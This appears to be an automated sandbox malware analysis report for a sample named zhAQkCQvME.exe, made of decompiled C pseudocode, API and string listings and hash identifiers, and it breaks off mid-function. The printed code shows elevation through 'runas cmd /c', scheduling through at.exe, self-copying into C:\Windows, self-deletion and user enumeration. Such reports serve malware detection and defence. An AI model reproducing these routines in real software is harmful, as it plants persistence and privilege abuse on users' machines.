0x004034b5
0x00000000
0x00000000
0x00403497
0x00000000
0x00000000
0x00403454
0x00403459
0x00000000
0x00000000
0x00403483
0x00000000
0x00000000
0x0040348f
0x00000000
0x00000000
0x00403425
0x0040342d
0x00403434
0x00403436
0x00403440
0x00403445
0x00000000
0x00000000
0x0040346a
0x0040346f
0x00000000
0x00000000
0x0040344d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00403369
0x00403369
0x00403369
0x0040336b
0x00000000
0x00000000
0x0040336d
0x0040336f
0x00000000
0x00000000
0x00000000
0x00000000
0x00403336
0x00403336
0x00403336
0x00403338
0x00000000
0x00000000
0x0040333a
0x0040333c
0x00000000
0x0040333c
0x00403314
0x00000000
0x00403314
0x004032f6
0x00000000
0x00000000
0x00000000
0x00000000
0x004032bd
0x004032bd
0x004032bd
0x004032bf
0x00000000
0x00000000
0x004032c1
0x004032c3
0x00000000
0x00403284
0x00403284
0x00000000
0x004036fb
0x004036ff
0x00403708
0x00403708

APIs

memset.MSVCRT ref: 00403214
GetCommandLineW.KERNEL32 ref: 00403255
CommandLineToArgvW.SHELL32(?,00000000), ref: 0040326F
ExitProcess.KERNEL32 ref: 00403708

Strings

C:\Users\user\Desktop\zhAQkCQvME.exe, xrefs: 00403534, 0040361E
%s\%d.exe, xrefs: 004035F6
3, xrefs: 004033A0
/c , xrefs: 0040353E
runas, xrefs: 00403561
cmd, xrefs: 0040355C
C:\Users\user\AppData\Local\Temp, xrefs: 004035F1

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CommandLine$ArgvExitProcessmemset
String ID: %s\%d.exe$/c $3$C:\Users\user\AppData\Local\Temp$C:\Users\user\Desktop\zhAQkCQvME.exe$cmd$runas
API String ID: 676070630-4253103225
Opcode ID: 637445f693fd4fe4e52b8e2ff76738513245014d760a7db2589ba4fcf5738d58
Instruction ID: 3aff25b5b5b839d286bdb63b04c3198c19c7bbfbadf3b70870fa9081c4f1213d
Opcode Fuzzy Hash: 637445f693fd4fe4e52b8e2ff76738513245014d760a7db2589ba4fcf5738d58
Instruction Fuzzy Hash: 35C11CF4E04204AADB209F51DD467AA7A785B0030AF1444BFF509762C2DBBD5BC58EAF

Uniqueness

Uniqueness Score: 100.00%

Function 0040F770, Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 321
stringfiletimeUNIQUECrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E0040F770(void* __fp0, signed int _a4) {
				int _v8;
				intOrPtr _v20;
				intOrPtr _v28;
				char _v36;
				char _v40;
				signed int _v44;
				char _v48;
				int _v52;
				char _v572;
				signed int _v576;
				signed short _v580;
				struct _SYSTEMTIME _v596;
				signed short _v600;
				int _v604;
				signed short _v608;
				char _v640;
				signed int _v644;
				signed int _v648;
				struct _SYSTEMTIME _v664;
				char _v1708;
				WCHAR* _v1712;
				short _v2236;
				signed int _v2240;
				signed int _v2244;
				signed int _t96;
				signed int _t97;
				signed int _t107;
				signed int _t109;
				signed int _t148;
				char _t157;
				intOrPtr _t215;
				intOrPtr _t216;
				void* _t217;
				void* _t218;
				void* _t233;

				_t233 = __fp0;
				_push(0xffffffff);
				_push(0x41c608);
				_push(0x403ab6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t215;
				_t216 = _t215 + 0xfffff750;
				_v28 = _t216;
				_v52 = 0;
				if(E0040C0D0() == 0) {
					_push(0);
					_t96 = E00407A30(_t156, 0x41f530); // executed
					_t217 = _t216 + 8;
					__eflags = _t96;
					if(_t96 >= 0) {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						L10:
						_t97 = E0040ED90(__eflags, _t233); // executed
						__eflags = _t97;
						if(_t97 != 0) {
							_v8 = 0;
							__eflags =  *0x41fb68 - 3;
							if( *0x41fb68 == 3) {
								E0040C1B0(_t156);
								L17:
								__eflags =  *0x420b90 - 3;
								if( *0x420b90 == 3) {
									L21:
									E00404120(_t156,  &_v48, 0, 0x14);
									_t218 = _t217 + 0xc;
									_v44 = _a4;
									_t157 =  *0x41fb68; // 0x2
									_v48 = _t157;
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									__eflags =  *0x421aa0;
									if( *0x421aa0 == 0) {
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										L34:
										E00410B40(__eflags, E0040ECB0,  &_v48); // executed
										_t217 = _t218 + 8;
										__eflags =  *0x41f710;
										if( *0x41f710 <= 0) {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											L66:
											_v8 = 0xffffffff;
											lstrcpynW( &_v2236, "C:\Users\Luke\Desktop\zhAQkCQvME.exe", 0x104);
											_v1712 = E00407F40( &_v2236, 0x5bf);
											lstrcatW( &_v2236, _v1712);
											E00408170( &_v1712);
											_t107 = E0040E080( &_v1712,  &_v2236);
											__eflags = _t107;
											if(_t107 != 0) {
												DeleteFileW( &_v2236);
											}
											E0040EE20();
											_t109 = 0;
											__eflags = 0;
											L70:
											 *[fs:0x0] = _v20;
											return _t109;
										}
										__eflags =  *0x421aa0;
										if( *0x421aa0 != 0) {
											__eflags =  *0x421a9c;
											if( *0x421a9c != 0) {
												 *0x421a9c(_v40);
											}
										}
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												goto L40;
											}
										}
										while(1) {
											L40:
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										__eflags =  *0x41fb68 - 3;
										if( *0x41fb68 == 3) {
											L63:
											goto L66;
										}
										__eflags =  *0x41f764 - 6;
										if( *0x41f764 >= 6) {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											__eflags =  *0x41f764 - 6;
											if( *0x41f764 < 6) {
												goto L63;
											}
											__eflags =  *0x420b90 - 3;
											if( *0x420b90 != 3) {
												goto L63;
											}
											_v604 = 0;
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											E0040EDF0(); // executed
											memset( &_v664, 0, 0x10);
											GetLocalTime( &_v664);
											_v648 = (_v664.wMinute & 0x0000ffff) + 2;
											asm("cdq");
											_v600 = (_v664.wHour & 0x0000ffff) + (_v648 & 0x0000ffff) / 0x3c;
											asm("cdq");
											_v648 = (_v648 & 0x0000ffff) % 0x3c;
											_v644 = (_v664.wMinute & 0x0000ffff) + 0xe;
											asm("cdq");
											_v608 = (_v664.wHour & 0x0000ffff) + (_v644 & 0x0000ffff) / 0x3c;
											asm("cdq");
											_t66 = (_v644 & 0x0000ffff) % 0x3c;
											__eflags = _t66;
											_v644 = _t66;
											_v604 = E00407F40(0x3c, 0x23c4);
											E004048B0(__eflags,  &_v640, 7, 0xa, 0x4201bc);
											_push(_v644 & 0x0000ffff);
											_push(_v608 & 0x0000ffff);
											_push(_v648 & 0x0000ffff);
											_push(_v600 & 0x0000ffff);
											_push( &_v640);
											_push("C:\Users\Luke\Desktop\zhAQkCQvME.exe");
											_push( &_v640);
											E00403B30( &_v1708, 0x208, _v604, "C:\Windows");
											E00408170( &_v604);
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											E004041B0( &_v1708,  &_v1708, 0, 0xbb8, 1); // executed
											_v2244 = 0;
											_v8 = 0xffffffff;
											_t109 = _v2244;
											goto L70;
										}
										__eflags =  *0x41fb68 - 2;
										if( *0x41fb68 != 2) {
											goto L63;
										} else {
											goto L45;
										}
										while(1) {
											L45:
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										E0040EDF0();
										memset( &_v596, 0, 0x10);
										GetLocalTime( &_v596);
										_v576 = (_v596.wMinute & 0x0000ffff) + 2;
										asm("cdq");
										_v580 = (_v596.wHour & 0x0000ffff) + (_v576 & 0x0000ffff) / 0x3c;
										asm("cdq");
										_t26 = (_v576 & 0x0000ffff) % 0x3c;
										__eflags = _t26;
										_v576 = _t26;
										_push("C:\Users\Luke\Desktop\zhAQkCQvME.exe");
										_push(_v576 & 0x0000ffff);
										_t179 =  &_v572;
										E00403B30( &_v572, 0x104, L"at.exe %u:%u \"%s\" /I", _v580 & 0x0000ffff);
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										E004041B0(_t179,  &_v572, 0, 0xbb8, 1);
										_v2240 = 0;
										_v8 = 0xffffffff;
										_t109 = _v2240;
										goto L70;
									}
									_t148 =  *0x421aa0(0, 0, 1,  &_v40,  &_v36); // executed
									__eflags = _t148;
									if(_t148 != 0) {
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										L31:
										goto L34;
									} else {
										goto L26;
									}
									while(1) {
										L26:
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									goto L31;
								}
								__eflags =  *0x41fb68 - 3;
								if( *0x41fb68 == 3) {
									goto L21;
								}
								__eflags =  *0x41f764 - 6;
								if( *0x41f764 >= 6) {
									goto L66;
								}
								__eflags =  *0x41fb68 - 2;
								if( *0x41fb68 != 2) {
									goto L66;
								}
								goto L21;
							} else {
								goto L13;
							}
							while(1) {
								L13:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t156 = _a4;
							E0040EC30(_t233, _a4); // executed
							_t217 = _t217 + 4;
							goto L17;
						}
						_t109 = E0040EE20() | 0xffffffff;
						goto L70;
					} else {
						goto L5;
					}
					while(1) {
						L5:
						_t156 = 0;
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					goto L10;
				}
				while(0 != 0) {
				}
				_t109 = 0xffffffff;
				goto L70;
			}

0x0040f770
0x0040f773
0x0040f775
0x0040f77a
0x0040f785
0x0040f786
0x0040f78d
0x0040f796
0x0040f799
0x0040f7a7
0x0040f7b7
0x0040f7be
0x0040f7c3
0x0040f7c6
0x0040f7c8
0x0040f7d2
0x0040f7d2
0x0040f7d4
0x00000000
0x00000000
0x0040f7d6
0x0040f7d8
0x0040f7d8
0x0040f7dd
0x0040f7df
0x0040f7ee
0x0040f7f5
0x0040f7fc
0x0040f812
0x0040f817
0x0040f817
0x0040f81e
0x0040f843
0x0040f84b
0x0040f850
0x0040f856
0x0040f859
0x0040f85f
0x0040f862
0x0040f862
0x0040f864
0x00000000
0x00000000
0x0040f866
0x0040f868
0x0040f86f
0x0040f899
0x0040f899
0x0040f89b
0x00000000
0x00000000
0x0040f89d
0x0040f89f
0x0040f8a8
0x0040f8ad
0x0040f8b0
0x0040f8b7
0x0040fb94
0x0040fb94
0x0040fb96
0x00000000
0x00000000
0x0040fb98
0x0040fb9a
0x0040fb9a
0x0040fbca
0x0040fbdd
0x0040fbf1
0x0040fbfe
0x0040fc0d
0x0040fc15
0x0040fc17
0x0040fc20
0x0040fc20
0x0040fc26
0x0040fc2b
0x0040fc2b
0x0040fc2d
0x0040fc30
0x0040fc3d
0x0040fc3d
0x0040f8bd
0x0040f8c4
0x0040f8c6
0x0040f8cd
0x0040f8d3
0x0040f8d3
0x0040f8cd
0x0040f8d9
0x0040f8d9
0x0040f8db
0x00000000
0x00000000
0x0040f8dd
0x0040f8df
0x0040f8df
0x0040f8df
0x0040f8e1
0x00000000
0x00000000
0x0040f8e3
0x0040f8e5
0x0040f8ec
0x0040fb92
0x00000000
0x0040fb92
0x0040f8f2
0x0040f8f9
0x0040f9ea
0x0040f9ea
0x0040f9ec
0x00000000
0x00000000
0x0040f9ee
0x0040f9f0
0x0040f9f7
0x00000000
0x00000000
0x0040f9fd
0x0040fa04
0x00000000
0x00000000
0x0040fa0a
0x0040fa14
0x0040fa14
0x0040fa16
0x00000000
0x00000000
0x0040fa18
0x0040fa1a
0x0040fa2a
0x0040fa39
0x0040fa49
0x0040fa5e
0x0040fa68
0x0040fa76
0x0040fa7e
0x0040fa8f
0x0040faa4
0x0040faae
0x0040fabc
0x0040fac2
0x0040fac2
0x0040fac4
0x0040fad8
0x0040faee
0x0040fafd
0x0040fb05
0x0040fb0d
0x0040fb15
0x0040fb1c
0x0040fb1d
0x0040fb28
0x0040fb41
0x0040fb50
0x0040fb58
0x0040fb58
0x0040fb5a
0x00000000
0x00000000
0x0040fb5c
0x0040fb6e
0x0040fb76
0x0040fb80
0x0040fb87
0x00000000
0x0040fb87
0x0040f8ff
0x0040f906
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f90c
0x0040f90c
0x0040f90c
0x0040f90e
0x00000000
0x00000000
0x0040f910
0x0040f912
0x0040f922
0x0040f931
0x0040f941
0x0040f956
0x0040f960
0x0040f96e
0x0040f974
0x0040f974
0x0040f976
0x0040f97d
0x0040f989
0x0040f99c
0x0040f9a3
0x0040f9ab
0x0040f9ab
0x0040f9ad
0x00000000
0x00000000
0x0040f9af
0x0040f9c1
0x0040f9c9
0x0040f9d3
0x0040f9da
0x00000000
0x0040f9da
0x0040f87f
0x0040f885
0x0040f887
0x0040f891
0x0040f891
0x0040f893
0x00000000
0x00000000
0x0040f895
0x0040f897
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f889
0x0040f889
0x0040f889
0x0040f88b
0x00000000
0x00000000
0x0040f88d
0x00000000
0x0040f88f
0x0040f820
0x0040f827
0x00000000
0x00000000
0x0040f829
0x0040f830
0x00000000
0x00000000
0x0040f836
0x0040f83d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f7fe
0x0040f7fe
0x0040f7fe
0x0040f800
0x00000000
0x00000000
0x0040f802
0x0040f804
0x0040f808
0x0040f80d
0x00000000
0x0040f80d
0x0040f7e6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f7ca
0x0040f7ca
0x0040f7ca
0x0040f7ca
0x0040f7cc
0x00000000
0x00000000
0x0040f7ce
0x00000000
0x0040f7d0
0x0040f7a9
0x0040f7ad
0x0040f7af
0x00000000

APIs

Part of subcall function 0040C0D0: GetModuleHandleA.KERNEL32(7E5E2BF0), ref: 0040C128
Part of subcall function 0040C0D0: GetModuleHandleA.KERNEL32(E020144A), ref: 0040C138

memset.MSVCRT ref: 0040F922
GetLocalTime.KERNEL32(?), ref: 0040F931
lstrcpynW.KERNEL32(?,C:\Users\user\Desktop\zhAQkCQvME.exe,00000104), ref: 0040FBCA
lstrcatW.KERNEL32(?,?), ref: 0040FBF1

Part of subcall function 0040E080: GetFileAttributesW.KERNELBASE(?,?,?,0040FC12,?), ref: 0040E088

DeleteFileW.KERNEL32(?), ref: 0040FC20

Strings

C:\Users\user\Desktop\zhAQkCQvME.exe, xrefs: 0040FBBE
C:\Windows, xrefs: 0040FB29
C:\Users\user\Desktop\zhAQkCQvME.exe, xrefs: 0040F97D, 0040FB1D
at.exe %u:%u "%s" /I, xrefs: 0040F992

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: FileHandleModule$AttributesDeleteLocalTimelstrcatlstrcpynmemset
String ID: C:\Users\user\Desktop\zhAQkCQvME.exe$C:\Users\user\Desktop\zhAQkCQvME.exe$C:\Windows$at.exe %u:%u "%s" /I
API String ID: 1040344659-2582910758
Opcode ID: 2c4e9c59d6a6264052bb7e869e86529be7696467644735194817241ba2313a80
Instruction ID: 3c0896619bb347e1bd1afc2b1b34461672ad4f9abf210b4f605e516af444a3c0
Opcode Fuzzy Hash: 2c4e9c59d6a6264052bb7e869e86529be7696467644735194817241ba2313a80
Instruction Fuzzy Hash: 92C100B1904214D6EB70EB61DC06BFA7274AF44304F1485BBE109B25D0EB7C5A89CF5E

Uniqueness

Uniqueness Score: 100.00%

Function 004077F0, Relevance: 18.2, APIs: 12, Instructions: 182
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E004077F0(void* __ecx) {
				intOrPtr _v8;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				void* _v20;
				int _v24;
				void* _v32;
				int _v36;
				int _v40;
				intOrPtr _v52;
				int _v56;
				intOrPtr _v60;
				void* _v64;
				intOrPtr _v68;
				int _v72;
				intOrPtr _v84;
				int _v88;
				char _v92;
				void* _v96;
				struct _ACL* _v100;
				void* _v104;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				struct _SID_IDENTIFIER_AUTHORITY _v112;
				intOrPtr _t67;

				_v104 = 0;
				_v24 = 1;
				_v112.Value = 0;
				_v111 = 0;
				_v110 = 0;
				_v109 = 0;
				_v108 = 0;
				_v107 = 0xf;
				_v16.Value = 0;
				_v15 = 0;
				_v14 = 0;
				_v13 = 0;
				_v12 = 0;
				_v11 = 1;
				_v100 = 0;
				_v96 = 0;
				_v20 = 0;
				E00404120(__ecx,  &_v92, 0, 0x20);
				if(AllocateAndInitializeSid( &_v16, 1, 0, 0, 0, 0, 0, 0, 0, 0,  &_v20) != 0) {
					_v92 = 0x1fffff;
					_v88 = 2;
					_v84 = 3;
					_v72 = 0;
					_v68 = 5;
					_v64 = _v20;
					if( *0x41f764 != 6 ||  *0x41f768 < 2) {
						if( *0x41f764 < 0xa) {
							goto L15;
						}
						goto L7;
					} else {
						L7:
						if(AllocateAndInitializeSid( &_v112, 2, 2, 1, 0, 0, 0, 0, 0, 0,  &_v96) != 0) {
							while(0 != 0) {
							}
							if(_v96 > 0) {
								_v60 = 0x1fffff;
								_v56 = 2;
								_v52 = 3;
								_v40 = 0;
								_v36 = 2;
								_v32 = _v96;
								_v24 = _v24 + 1;
							}
							L15:
							while(0 != 0) {
							}
							_t67 =  *0x4219c8(_v24,  &_v92, 0,  &_v100); // executed
							_v8 = _t67;
							if(_v8 == 0) {
								_v104 = LocalAlloc(0x40, 0x14);
								if(_v104 != 0) {
									if(InitializeSecurityDescriptor(_v104, 1) != 0) {
										if(SetSecurityDescriptorDacl(_v104, 1, _v100, 0) != 0) {
											while(0 != 0) {
											}
											if(_v96 != 0) {
												FreeSid(_v96);
											}
											FreeSid(_v20);
											return _v104;
										}
										while(0 != 0) {
										}
										L38:
										if(_v96 != 0) {
											FreeSid(_v96);
										}
										if(_v20 != 0) {
											FreeSid(_v20);
										}
										if(_v104 != 0) {
											LocalFree(_v104);
										}
										if(_v100 != 0) {
											LocalFree(_v100);
										}
										return _v104;
									}
									while(0 != 0) {
									}
									goto L38;
								}
								while(0 != 0) {
								}
								goto L38;
							}
							while(0 != 0) {
							}
							goto L38;
						}
						while(0 != 0) {
						}
						goto L38;
					}
				}
				while(0 != 0) {
				}
				goto L38;
			}

0x004077f6
0x004077fd
0x00407804
0x00407808
0x0040780c
0x00407810
0x00407814
0x00407818
0x0040781c
0x00407820
0x00407824
0x00407828
0x0040782c
0x00407830
0x00407834
0x0040783b
0x00407842
0x00407851
0x0040787b
0x00407888
0x0040788f
0x00407896
0x0040789d
0x004078a4
0x004078ae
0x004078b8
0x004078ca
0x00000000
0x00000000
0x00000000
0x004078cc
0x004078cc
0x004078ee
0x004078fb
0x004078ff
0x00407905
0x00407907
0x0040790e
0x00407915
0x0040791c
0x00407923
0x0040792d
0x00407936
0x00407936
0x00000000
0x00407939
0x0040793d
0x0040794d
0x00407953
0x0040795a
0x0040796e
0x00407975
0x0040798d
0x004079ab
0x004079b5
0x004079b9
0x004079bf
0x004079c5
0x004079c5
0x004079cf
0x00000000
0x004079d5
0x004079ad
0x004079b1
0x004079da
0x004079de
0x004079e4
0x004079e4
0x004079ee
0x004079f4
0x004079f4
0x004079fe
0x00407a04
0x00407a04
0x00407a0e
0x00407a14
0x00407a14
0x00000000
0x00407a1a
0x0040798f
0x00407993
0x00000000
0x00407995
0x00407977
0x0040797b
0x00000000
0x0040797d
0x0040795c
0x00407960
0x00000000
0x00407962
0x004078f0
0x004078f4
0x00000000
0x004078f6
0x004078b8
0x0040787d
0x00407881
0x00000000

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00407873
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004078E6
SetEntriesInAclA.ADVAPI32(?,?,00000000,?), ref: 0040794D
LocalAlloc.KERNEL32(00000040,00000014), ref: 00407968
InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 00407985
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004079A3
FreeSid.ADVAPI32(?), ref: 004079C5
FreeSid.ADVAPI32(?), ref: 004079CF
FreeSid.ADVAPI32(?), ref: 004079E4
FreeSid.ADVAPI32(?), ref: 004079F4
LocalFree.KERNEL32(?), ref: 00407A04
LocalFree.KERNEL32(?), ref: 00407A14

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Free$InitializeLocal$AllocateDescriptorSecurity$AllocDaclEntries
String ID:
API String ID: 3430154970-0
Opcode ID: dd7bf530bbc54f23d3b047c777b9e9a97f3ca621d43d704841bfd591640a00e1
Instruction ID: 860d7b17e195d3392ca7ed310b66c5440cd4afac2741e4a3aec8bdc7a2785d2f
Opcode Fuzzy Hash: dd7bf530bbc54f23d3b047c777b9e9a97f3ca621d43d704841bfd591640a00e1
Instruction Fuzzy Hash: 866151B1E08348DBEF14CBE0C958BAEBBB5AB14304F14813AD5057B2D0D7B96946CB5B

Uniqueness

Uniqueness Score: 1.69%

Function 00407A30, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 170
libraryloaderUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00407A30(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				signed int _v12;
				signed int _v16;
				CHAR* _v20;
				struct HINSTANCE__* _v528;
				intOrPtr _v532;
				signed int _v536;
				CHAR* _v540;
				signed int _v544;
				CHAR* _v548;
				struct HINSTANCE__* _v552;
				CHAR* _v556;
				CHAR* _t95;
				CHAR* _t109;
				CHAR* _t118;
				struct HINSTANCE__* _t119;
				void* _t168;
				void* _t169;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;

				_v536 = 0;
				_v16 = 0;
				_v544 = 0;
				_v12 = 0;
				_v540 = E00408060(__ecx, 0x925);
				_t95 = E00408060(__ecx, 0x269c);
				_t171 = _t169 + 8;
				_v20 = _t95;
				_v8 = GetModuleHandleA(_v540);
				if(_v8 != 0) {
					E00408170( &_v540);
					_t172 = _t171 + 4;
					_v532 = 0x925;
					_v528 = _v8;
					_v12 = 1;
					if(_v20 != 0) {
						 *0x4219f0 = GetProcAddress(_v8, _v20);
						E00408170( &_v20);
						_t173 = _t172 + 4;
						_v16 = 0;
						while( *((intOrPtr*)(_a4 + _v16 * 0xc)) != 0) {
							_v552 = 0;
							_v548 = 0;
							_v544 = 0;
							while(_v544 < _v12) {
								if( *((intOrPtr*)(_t168 + _v544 * 8 - 0x210)) !=  *((intOrPtr*)(_a4 + 8 + _v16 * 0xc))) {
									_v544 = _v544 + 1;
									continue;
								}
								_v552 =  *((intOrPtr*)(_t168 + _v544 * 8 - 0x20c));
								break;
							}
							if(_v552 != 0) {
								L24:
								_v556 = 0;
								_t109 = E00408060(_a4,  *((intOrPtr*)(_a4 + 4 + _v16 * 0xc)));
								_t174 = _t173 + 4;
								_v556 = _t109;
								if(_v556 == 0) {
									L30:
									E00408170( &_v548);
									_t173 = _t174 + 4;
									L7:
									_v16 = _v16 + 1;
									continue;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + _v16 * 0xc)))) = GetProcAddress(_v552, _v556);
								if( *((intOrPtr*)( *((intOrPtr*)(_a4 + _v16 * 0xc)))) != 0) {
									L29:
									E00408170( &_v556);
									_t174 = _t174 + 4;
									goto L30;
								}
								while(0 != 0) {
								}
								_v536 = 0xfffffffe;
								goto L29;
							}
							_t118 = E00408060( *((intOrPtr*)(_a4 + 8 + _v16 * 0xc)),  *((intOrPtr*)(_a4 + 8 + _v16 * 0xc)));
							_t173 = _t173 + 4;
							_v548 = _t118;
							if(_v548 == 0) {
								goto L24;
							}
							_t119 = LoadLibraryA(_v548); // executed
							_v552 = _t119;
							if(_v552 != 0) {
								if(_v12 >= 0x40) {
									_v12 = 0;
								}
								 *((intOrPtr*)(_t168 + _v12 * 8 - 0x210)) =  *((intOrPtr*)(_a4 + 8 + _v16 * 0xc));
								 *(_t168 + _v12 * 8 - 0x20c) = _v552;
								_v12 = _v12 + 1;
								goto L24;
							}
							while(0 != 0) {
							}
							_v536 = 0xfffffffd;
							E00408170( &_v548);
							_t173 = _t173 + 4;
							goto L7;
						}
						return _v536;
					}
					return 0xfffffffe;
				}
				while(0 != 0) {
				}
				return E00408170( &_v540) | 0xffffffff;
			}

0x00407a39
0x00407a43
0x00407a4a
0x00407a54
0x00407a68
0x00407a73
0x00407a78
0x00407a7b
0x00407a8b
0x00407a92
0x00407ab8
0x00407abd
0x00407ac0
0x00407acd
0x00407ad3
0x00407ade
0x00407af8
0x00407b01
0x00407b06
0x00407b09
0x00407b1b
0x00407b2e
0x00407b38
0x00407b42
0x00407b5d
0x00407b82
0x00407b57
0x00000000
0x00407b57
0x00407b91
0x00000000
0x00407b91
0x00407ba2
0x00407c4c
0x00407c4c
0x00407c64
0x00407c69
0x00407c6c
0x00407c79
0x00407ccd
0x00407cd4
0x00407cd9
0x00407b12
0x00407b18
0x00000000
0x00407b18
0x00407c9b
0x00407cac
0x00407cbe
0x00407cc5
0x00407cca
0x00000000
0x00407cca
0x00407cae
0x00407cb2
0x00407cb4
0x00000000
0x00407cb4
0x00407bb6
0x00407bbb
0x00407bbe
0x00407bcb
0x00000000
0x00000000
0x00407bd4
0x00407bda
0x00407be7
0x00407c13
0x00407c15
0x00407c15
0x00407c2c
0x00407c3c
0x00407c49
0x00000000
0x00407c49
0x00407be9
0x00407bed
0x00407bef
0x00407c00
0x00407c05
0x00000000
0x00407c05
0x00000000
0x00407ce1
0x00000000
0x00407ae0
0x00407a94
0x00407a98
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 00407A85
GetProcAddress.KERNEL32(00000000,00000000), ref: 00407AF2
LoadLibraryA.KERNEL32(00000000), ref: 00407BD4

Strings

%, xrefs: 00407AC0
@, xrefs: 00407C0F

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID: %$@
API String ID: 310444273-1045240745
Opcode ID: 0c67786184471d10b45918a644667eb6b098a8fa9bd1eec65d1b1ab3436b9461
Instruction ID: d659fa244be8e53bdbc0a60006df7d5aef2728d78176860c7d99e105eec7f3ab
Opcode Fuzzy Hash: 0c67786184471d10b45918a644667eb6b098a8fa9bd1eec65d1b1ab3436b9461
Instruction Fuzzy Hash: 02813FB4D04218EBDB24DF90D988B9DB7B5BB58304F1081AAD4196B391D738AA85CF46

Uniqueness

Uniqueness Score: 100.00%

Function 00410BA0, Relevance: 7.6, APIs: 5, Instructions: 109
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 19%

			E00410BA0(short* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				char* _v28;
				short _v540;
				void* _v544;
				long _v548;
				long _v552;
				union _SID_NAME_USE _v556;
				int _t48;
				void* _t55;
				void* _t87;

				_v12 = 0;
				_v20 = 0;
				_v24 = 0;
				while(0 != 0) {
				}
				_t48 = NetUserEnum(_a4, 0, 2,  &_v28, 0xffffffff,  &_v12,  &_v20,  &_v24); // executed
				_v16 = _t48;
				if(_v16 == 0) {
					_v8 = 0;
					while(_v8 < _v12) {
						_v552 = 0;
						_v548 = 0;
						LookupAccountNameW(0,  *(_v28 + _v8 * 4), 0,  &_v552, 0,  &_v548,  &_v556);
						_t55 = E00403EE0(_v28, _v552);
						_t87 = _t87 + 4;
						_v544 = _t55;
						if(_v544 != 0) {
							_v548 = 0x200;
							if(LookupAccountNameW(0,  *(_v28 + _v8 * 4), _v544,  &_v552,  &_v540,  &_v548,  &_v556) != 0) {
